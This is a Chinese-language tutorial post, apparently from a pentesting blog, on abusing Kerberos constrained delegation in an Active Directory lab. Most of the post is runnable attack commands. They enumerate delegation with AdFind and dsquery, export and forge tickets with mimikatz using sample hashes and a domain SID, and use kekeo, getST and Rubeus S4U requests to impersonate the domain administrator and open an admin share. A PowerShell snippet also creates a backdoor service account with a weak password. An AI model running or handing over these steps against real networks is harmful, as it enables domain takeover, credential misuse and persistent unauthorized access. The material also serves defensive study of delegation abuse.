- 效果
域服务账号/计算机可以去请求其他指定服务的票据,这个得看域管理员给这个服务开了其它哪些服务的权限。
类似于SSO中不同用户有不同的权限,可以打开不同的网站。 - 条件
- 操作一(计算机账号具有约束委派权限)
测试环境先直接给3B6这台计算机添加约束委派
查找域中的委派关系:
AdFind.exe -f "(&(msds-allowedtodelegateto=*))" cn distinguishedName msDS-AllowedToDelegateTodsquery.exe * -filter "(&(msds-allowedtodelegateto=*))" -limit 0 -attr distinguishedName msDS-AllowedToDelegateTo
如果有3B6的权限,可直接导出票据,或者有之前的计算机hash,用hash去申请票据。在用票据去申请有委派权限服务的ST
mimikatz privilege::debug "sekurlsa::tickets /export" exitkekeo "tgs::s4u /tgt:WIN-V5480N4V3B6$@krbtgt-TT.COM.kirbi /user:administrator /service:cifs/WIN-J341S97EGGH.tt.com" exit
mimikatz "kerberos::golden /domain:tt.com /admin:NoThisUser /sid:S-1-5-21-1881962959-1052950955-462027270 /rc4:1b190b45caa545358a8b711f69fe6971 /target:WIN-V5480N4V3B6 /service:CIFS /ticket" exitkekeo "tgs::s4u /tgt:ticket.kirbi /user:administrator@tt.com /service:cifs/WIN-J341S97EGGH.tt.com" exit
导入ST,访问服务
mimikatz privilege::debug "kerberos::ptt C:\Users\ddh\Desktop\TGS_administrator@TT.COM_WIN-V5480N4V3B6$@TT.COM.kirbi" exitdir \\WIN-J341S97EGGH\c$
- 操作二(服务账号具有约束委派权限)
测试环境先给用户添加约束委派权限(实际情况是目标域的管理员为了维护或使用资源而添加的):
特别注意,还需要把普通账号设置为服务账号。
Import-Module ActiveDirectoryNew-ADUser -Name "Backdoor" -SamAccountName backdoor_svc -UserPrincipalName backdoor_svc@tt.com -ServicePrincipalNames "backdoor/backdoor.tt.com" -AccountPassword (convertto-securestring "Admin123" -asplaintext -force) -PasswordNeverExpires $True -PassThru | Enable-ADAccount$user = Get-ADUser backdoor_svcSet-ADObject $user -Add @{ "msDS-AllowedToDelegateTo" = @("HOST/WIN-J341S97EGGH.tt.com") }Set-ADAccountControl $user -TrustedToAuthForDelegation $true
查找域中的委派关系:
AdFind.exe -f "(&(msds-allowedtodelegateto=*))" cn userPrincipalName distinguishedName msDS-AllowedToDelegateTodsquery.exe * -filter "(&(msds-allowedtodelegateto=*))" -limit 0 -attr userPrincipalName distinguishedName msDS-AllowedToDelegateTo
C:\Users\ddh\Desktop>AdFind.exe -f "(&(msds-allowedtodelegateto=*))" cn userPrincipalName distinguishedName msDS-AllowedToDelegateTodn:CN=Backdoor,CN=Users,DC=tt,DC=com>cn: Backdoor>distinguishedName: CN=Backdoor,CN=Users,DC=tt,DC=com>userPrincipalName: backdoor_svc@tt.com>msDS-AllowedToDelegateTo: cifs/WIN-J341S97EGGH.tt.com/tt.com>msDS-AllowedToDelegateTo: cifs/WIN-J341S97EGGH.tt.com>msDS-AllowedToDelegateTo: cifs/WIN-J341S97EGGH>msDS-AllowedToDelegateTo: cifs/WIN-J341S97EGGH.tt.com/TT>msDS-AllowedToDelegateTo: cifs/WIN-J341S97EGGH/TT
发现backdoor_svc账号拥有cifs/WIN-J341S97EGGH.tt.com服务权限,申请对应服务的ST:
使用kekeo(失败):
先申请用户的TGT,如果控制的主机上登录的有backdoor_svc用户,则使用sekurlsa::tickets /export导出backdoor_svc的票据也行kekeo "tgt::ask /user:backdoor_svc /domain:tt.com /NTLM:e45a314c664d40a227f9540121d1a29d" exitkekeo "tgt::ask /user:backdoor_svc /domain:tt.com /password:Admin123" exit
申请STkekeo "tgs::s4u /tgt:TGT_backdoor_svc@TT.COM_krbtgt~tt.com@TT.COM.kirbi /user:administrator@tt.com /service:HOST/WIN-J341S97EGGH.tt.com" exit导入STmimikatz privilege::debug "kerberos::ptt C:\Users\ddh\Desktop\TGS_administrator@tt.com@TT.COM_backdoor_svc@TT.COM.kirbi" exit访问服务dir \\WIN-J341S97EGGH\c$
使用getst(成功):
getst.exe -dc-ip 192.168.19.8 -spn cifs/WIN-J341S97EGGH.tt.com -impersonate Administrator tt.com/backdoor_svc:Admin123mimikatz privilege::debug "kerberos::ptc C:\Users\ddh\Desktop\Administrator.ccache" exit
使用Rubeus(成功):
Rubeus.exe s4u /user:backdoor_svc /domain:tt.com /rc4:e45a314c664d40a227f9540121d1a29d /impersonateuser:administrator /msdsspn:cifs/WIN-J341S97EGGH.tt.com /altservice:cifs /ptt
若有收获,就点个赞吧
0 人点赞
